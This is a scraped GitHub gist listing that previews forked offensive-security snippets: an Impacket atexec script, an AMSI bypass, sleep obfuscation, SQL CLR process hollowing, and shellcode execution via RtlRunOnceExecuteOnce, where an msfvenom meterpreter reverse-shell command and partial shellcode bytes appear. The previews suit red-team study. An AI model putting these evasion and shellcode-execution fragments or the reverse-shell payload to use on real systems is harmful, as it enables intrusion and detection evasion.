| title | author | date | source | notoc |
|---|---|---|---|---|
LDAP Search Filter Cheatsheet |
Jon LaBelle |
January 4, 2021 |
true |
S sunnyneo
sunnyneo
/ atexec_rpc.py
Created
November 30, 2024 10:24
— forked from ThePirateWhoSmellsOfSunflowers/atexec_rpc.py
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # Impacket - Collection of Python classes for working with network protocols. | |
| # | |
| # Copyright Fortra, LLC and its affiliated companies | |
| # | |
| # All rights reserved. | |
| # | |
| # This software is provided under a slightly modified version | |
| # of the Apache Software License. See the accompanying LICENSE file | |
| # for more information. |
sunnyneo
/ Get-LoggedOn.py
Created
May 16, 2024 07:09
— forked from GeisericII/Get-LoggedOn.py
Stupid simple script copied and pasted from reg.py/lookupsid and inspired from itm4n's session enum via registry
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| from __future__ import division | |
| from __future__ import print_function | |
| import re | |
| import codecs | |
| import logging | |
| import time | |
| import argparse | |
| import sys | |
| from impacket import version |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| int main() { | |
| HANDLE file = CreateFileA(".\\test.txt", GENERIC_WRITE, FILE_SHARE_WRITE, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL|FILE_ATTRIBUTE_ENCRYPTED|FILE_FLAG_DELETE_ON_CLOSE, NULL); | |
| if (!file || file == INVALID_HANDLE_VALUE) { | |
| return GetLastError(); | |
| } | |
| CloseHandle(file); | |
| return 0; | |
| } |
sunnyneo
/ rdp_pack.cpp
Created
January 11, 2024 01:26
— forked from odzhan/rdp_pack.cpp
Compression using RDP API
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| Compression using undocumented API in rdpbase.dll | |
| RDPCompressEx supports four algorithms : MPPC-8K, MPPC-64K, NCRUSH and XCRUSH. | |
| This code supports all except NCRUSH. | |
| The MPPC compression ratio is very similar to LZSS, so this could be quite useful for shellcode trying to evade detection. | |
| NCRUSH compression appears to work but fails for decompression. |
sunnyneo
/ Program.cs
Created
December 13, 2023 07:12
— forked from susMdT/Program.cs
C# Amsi bypass with hardware breakpint
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Collections.Generic; | |
| using System.Linq; | |
| using System.Runtime.CompilerServices; | |
| using System.Net; | |
| using System.Reflection; | |
| using System.Runtime.InteropServices; | |
| namespace Test | |
| { | |
| // CCOB IS THE GOAT |
sunnyneo
/ shitcode.c
Created
May 29, 2023 15:42
— forked from susMdT/shitcode.c
hahaha da shellcode go brrrr
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <Core.h> | |
| #include <Win32.h> | |
| #include <Structs.h> | |
| #include <Sleep.h> | |
| #include <Utils.h> | |
| SEC( text, C ) VOID Ekko ( DWORD SleepTime, PINSTANCE Instance) | |
| { |
sunnyneo
/ hollow.cs
Created
May 3, 2023 09:29
— forked from skahwah/hollow.cs
Custom assembly that is compatible with SQL CLR attacks.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library c:\temp\hollow.cs | |
| //SQLRecon.exe -a Local -s SQL02 -d master -u sa -p Password123 -m clr -o c:\temp\hollow.dll -f BaconTime | |
| using System; | |
| using System.Data; | |
| using System.Data.SqlClient; | |
| using System.Data.SqlTypes; | |
| using System.Diagnostics; | |
| using System.IO; | |
| using System.Runtime.InteropServices; | |
| using Microsoft.SqlServer.Server; |
sunnyneo
/ RtlRunOnceExecuteOnceShellcodeExec.c
Created
April 7, 2023 04:31
— forked from paranoidninja/RtlRunOnceExecuteOnceShellcodeExec.c
Shellcode execution via RtlRunOnceExecuteOnce NtAPI
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <stdio.h> | |
| extern WORD WINAPI RtlRunOnceExecuteOnce(RTL_RUN_ONCE *once, PRTL_RUN_ONCE_INIT_FN func, void *param, void **context); | |
| typedef ULONG (WINAPI* RTL_RUN_ONCE_INIT_FN)(_Inout_ PRTL_RUN_ONCE RunOnce, _Inout_opt_ PVOID Parameter, _Inout_opt_ PVOID *Context); | |
| // msfvenom LPORT=8080 LHOST=172.16.219.1 -p windows/x64/meterpreter/reverse_tcp -f c | |
| unsigned char shellcode_bin[] = | |
| "\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50" | |
| "\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52" |
sunnyneo
/ managedhook.cs
Created
January 25, 2023 13:51
— forked from susMdT/managedhook.cs
Based on NaxAlpha's work
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Runtime.CompilerServices; | |
| using System.Runtime.InteropServices; | |
| namespace ShittyHook | |
| { | |
| internal class Program | |
| { |
sunnyneo
/ ldap_search_filter_cheatsheet.md
Created
November 7, 2022 16:02
— forked from jonlabelle/ldap_search_filter_cheatsheet.md
LDAP Search Filter Cheatsheet
NewerOlder